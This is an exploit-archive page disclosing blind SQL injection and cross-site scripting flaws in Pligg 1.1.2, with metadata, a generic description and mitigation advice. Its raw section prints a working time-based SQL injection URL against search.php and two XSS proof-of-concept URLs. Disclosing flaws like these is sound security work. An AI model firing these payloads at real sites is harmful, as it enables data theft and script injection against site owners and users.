header-logo
Suggest Exploit
vendor:
Pligg
by:
Michael Brooks
9
CVSS
HIGH
Blind SQL Injection & XSS
89 (SQL Injection) & 79 (XSS)
CWE
Product Name: Pligg
Affected Version From: Pligg 1.1.2
Affected Version To: Pligg 1.1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:pligg:pligg:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

Blind SQL Injection & XSS

Blind SQL Injection is a type of attack that allows an attacker to execute malicious SQL statements on a database without the knowledge of the database owner. The attacker can use this technique to gain access to sensitive data, such as passwords, credit card numbers, and other confidential information. XSS is a type of attack that allows an attacker to inject malicious code into a web page or application. The attacker can use this technique to gain access to sensitive data, such as passwords, credit card numbers, and other confidential information.

Mitigation:

To mitigate against Blind SQL Injection, input validation should be used to ensure that user-supplied data is not used in SQL statements. To mitigate against XSS, input validation should be used to ensure that user-supplied data is not used in HTML or JavaScript code.
Source

Exploit-DB raw data:

Credit: Michael Brooks

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0

XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search=" onclick=alert(1) a=

Navigation

Suggest Exploit

Services By CQR